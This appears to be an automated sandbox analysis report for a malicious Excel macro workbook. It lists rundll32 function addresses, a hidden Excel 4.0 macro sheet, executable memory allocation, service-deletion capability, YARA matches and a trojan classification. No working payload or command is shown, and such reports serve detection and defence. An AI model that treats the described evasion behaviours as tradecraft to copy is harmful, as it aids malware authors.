Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00775548 11_2_00775548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00788519 11_2_00788519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_007895FA 11_2_007895FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0077E5CF 11_2_0077E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078A666 11_2_0078A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078C631 11_2_0078C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00788606 11_2_00788606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0077D6D8 11_2_0077D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_007866CA 11_2_007866CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078176B 11_2_0078176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0077B74D 11_2_0077B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00777735 11_2_00777735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078473C 11_2_0078473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00779714 11_2_00779714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00774816 11_2_00774816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00781889 11_2_00781889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00778969 11_2_00778969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078894B 11_2_0078894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_007759F2 11_2_007759F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_007909B5 11_2_007909B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00771A56 11_2_00771A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078AA30 11_2_0078AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0077EA99 11_2_0077EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0077BB7E 11_2_0077BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078CB5B 11_2_0078CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00778B3D 11_2_00778B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078BB23 11_2_0078BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00780B19 11_2_00780B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078DBEA 11_2_0078DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00788BE3 11_2_00788BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00772BD9 11_2_00772BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00789BCF 11_2_00789BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00787BA6 11_2_00787BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00779B83 11_2_00779B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00784B87 11_2_00784B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00774C5D 11_2_00774C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00786C49 11_2_00786C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00777C37 11_2_00777C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078AC3A 11_2_0078AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00773C3C 11_2_00773C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00790C14 11_2_00790C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078DCF7 11_2_0078DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00785CC4 11_2_00785CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00776D24 11_2_00776D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00786DF8 11_2_00786DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00787DD5 11_2_00787DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00779DCF 11_2_00779DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078AE6D 11_2_0078AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00775E60 11_2_00775E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00780E53 11_2_00780E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00790E3A 11_2_00790E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00773E3F 11_2_00773E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078BE27 11_2_0078BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0077AEFB 11_2_0077AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00789EEC 11_2_00789EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00774EE3 11_2_00774EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078DEDC 11_2_0078DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0077EE81 11_2_0077EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0077CF47 11_2_0077CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00790F33 11_2_00790F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0077DFF3 11_2_0077DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00777FF2 11_2_00777FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00213C3C 12_2_00213C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00219011 12_2_00219011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022044F 12_2_0022044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002220BA 12_2_002220BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021F8FD 12_2_0021F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021D6D8 12_2_0021D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022473C 12_2_0022473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00224116 12_2_00224116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002313AD 12_2_002313AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021AB87 12_2_0021AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00217FF2 12_2_00217FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002159F2 12_2_002159F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002295FA 12_2_002295FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022BE27 12_2_0022BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022AA30 12_2_0022AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022C631 12_2_0022C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00217C37 12_2_00217C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022F435 12_2_0022F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022AC3A 12_2_0022AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00230E3A 12_2_00230E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00213E3F 12_2_00213E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00220001 12_2_00220001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00228606 12_2_00228606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00230C14 12_2_00230C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00214816 12_2_00214816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00215E60 12_2_00215E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022A666 12_2_0022A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022AE6D 12_2_0022AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022907F 12_2_0022907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00226C49 12_2_00226C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00212051 12_2_00212051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00212251 12_2_00212251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00220E53 12_2_00220E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00230056 12_2_00230056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00211A56 12_2_00211A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00214C5D 12_2_00214C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002170B3 12_2_002170B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021EE81 12_2_0021EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00221889 12_2_00221889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021EA99 12_2_0021EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021F09B 12_2_0021F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00214EE3 12_2_00214EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002164E2 12_2_002164E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022A2E8 12_2_0022A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00229EEC 12_2_00229EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022DCF7 12_2_0022DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021AEFB 12_2_0021AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021B2C7 12_2_0021B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00225CC4 12_2_00225CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002266CA 12_2_002266CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021E2CC 12_2_0021E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022DEDC 12_2_0022DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022BB23 12_2_0022BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00216D24 12_2_00216D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00230F33 12_2_00230F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00217735 12_2_00217735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00218B3D 12_2_00218B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00219714 12_2_00219714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00228519 12_2_00228519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00220B19 12_2_00220B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00215361 12_2_00215361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00218969 12_2_00218969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022176B 12_2_0022176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021BB7E 12_2_0021BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021CF47 12_2_0021CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00214346 12_2_00214346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00215548 12_2_00215548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022894B 12_2_0022894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021B74D 12_2_0021B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00222550 12_2_00222550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022CB5B 12_2_0022CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021A55F 12_2_0021A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022C3A0 12_2_0022C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00227BA6 12_2_00227BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002309B5 12_2_002309B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002181B7 12_2_002181B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002151BB 12_2_002151BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00219B83 12_2_00219B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00224B87 12_2_00224B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022D389 12_2_0022D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021E991 12_2_0021E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022E395 12_2_0022E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00228BE3 12_2_00228BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022DBEA 12_2_0022DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021DFF3 12_2_0021DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00226DF8 12_2_00226DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00229BCF 12_2_00229BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00219DCF 12_2_00219DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021E5CF 12_2_0021E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00227DD5 12_2_00227DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00212BD9 12_2_00212BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030F8FD 15_2_0030F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030E991 15_2_0030E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030AB87 15_2_0030AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031C631 15_2_0031C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031AA30 15_2_0031AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031F435 15_2_0031F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00307C37 15_2_00307C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00320E3A 15_2_00320E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031AC3A 15_2_0031AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00303C3C 15_2_00303C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00303E3F 15_2_00303E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031BE27 15_2_0031BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00309011 15_2_00309011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00304816 15_2_00304816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00320C14 15_2_00320C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00310001 15_2_00310001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00318606 15_2_00318606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031907F 15_2_0031907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00305E60 15_2_00305E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031A666 15_2_0031A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031AE6D 15_2_0031AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00302051 15_2_00302051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00302251 15_2_00302251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00310E53 15_2_00310E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00320056 15_2_00320056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00301A56 15_2_00301A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00304C5D 15_2_00304C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00316C49 15_2_00316C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031044F 15_2_0031044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003070B3 15_2_003070B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003120BA 15_2_003120BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030EA99 15_2_0030EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030F09B 15_2_0030F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030EE81 15_2_0030EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00311889 15_2_00311889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031DCF7 15_2_0031DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030AEFB 15_2_0030AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003064E2 15_2_003064E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00304EE3 15_2_00304EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031A2E8 15_2_0031A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00319EEC 15_2_00319EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030D6D8 15_2_0030D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031DEDC 15_2_0031DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00315CC4 15_2_00315CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030B2C7 15_2_0030B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003166CA 15_2_003166CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030E2CC 15_2_0030E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00320F33 15_2_00320F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00307735 15_2_00307735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031473C 15_2_0031473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00308B3D 15_2_00308B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031BB23 15_2_0031BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00306D24 15_2_00306D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00309714 15_2_00309714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00314116 15_2_00314116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00318519 15_2_00318519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00310B19 15_2_00310B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030BB7E 15_2_0030BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00305361 15_2_00305361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00308969 15_2_00308969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031176B 15_2_0031176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00312550 15_2_00312550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031CB5B 15_2_0031CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030A55F 15_2_0030A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00304346 15_2_00304346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030CF47 15_2_0030CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00305548 15_2_00305548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031894B 15_2_0031894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030B74D 15_2_0030B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003209B5 15_2_003209B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003081B7 15_2_003081B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003051BB 15_2_003051BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031C3A0 15_2_0031C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00317BA6 15_2_00317BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003213AD 15_2_003213AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031E395 15_2_0031E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00309B83 15_2_00309B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00314B87 15_2_00314B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031D389 15_2_0031D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00307FF2 15_2_00307FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003059F2 15_2_003059F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030DFF3 15_2_0030DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00316DF8 15_2_00316DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003195FA 15_2_003195FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00318BE3 15_2_00318BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031DBEA 15_2_0031DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00317DD5 15_2_00317DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00302BD9 15_2_00302BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00319BCF 15_2_00319BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00309DCF 15_2_00309DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030E5CF 15_2_0030E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002C0001 16_2_002C0001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002B9011 16_2_002B9011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002CAE6D 16_2_002CAE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002CA666 16_2_002CA666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002C907F 16_2_002C907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002C044F 16_2_002C044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002C20BA 16_2_002C20BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002BEE81 16_2_002BEE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002CA2E8 16_2_002CA2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002B64E2 16_2_002B64E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002BF8FD 16_2_002BF8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002BE2CC 16_2_002BE2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002B6D24 16_2_002B6D24
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Found a hidden Excel 4.0 Macro sheet
Source: NZW-010122 BNUV-280122.xlsm Macro extractor: Sheet name: LINKO
Source: NZW-010122 BNUV-280122.xlsm Macro extractor: Sheet name: LINKO
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Contains functionality to delete services
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021E249 DeleteService, 12_2_0021E249
Yara signature match
Source: NZW-010122 BNUV-280122.xlsm, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\NZW-010122 BNUV-280122.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Svccveo\ Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Document contains embedded VBA macros
Source: NZW-010122 BNUV-280122.xlsm OLE indicator, VBA macros: true
Source: NZW-010122 BNUV-280122.xls.0.dr OLE indicator, VBA macros: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$NZW-010122 BNUV-280122.xlsm Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSM@21/12@2/48
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: NZW-010122 BNUV-280122.xlsm OLE indicator, Workbook stream: true
Source: NZW-010122 BNUV-280122.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 9_2_100125C0
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................P...............................P.......................`I.........v.....................K........Z............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.w....................?E9k....................................}..v............0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................?E9k..... ..............................}..v....`.......0.................Z............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.w.....................D9k....................................}..v............0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................D9k....x.Z.............................}..v....0.......0.................Z............................. Jump to behavior
